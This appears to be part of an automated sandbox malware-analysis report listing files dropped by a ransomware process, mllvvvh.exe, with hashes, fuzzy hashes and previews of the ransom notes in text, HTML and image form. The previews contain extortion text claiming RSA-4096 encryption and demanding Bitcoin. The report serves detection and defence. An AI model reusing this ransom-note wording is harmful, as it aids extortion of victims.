                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{99b095d8-5959-4820-bea7-7448c8427b4e}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
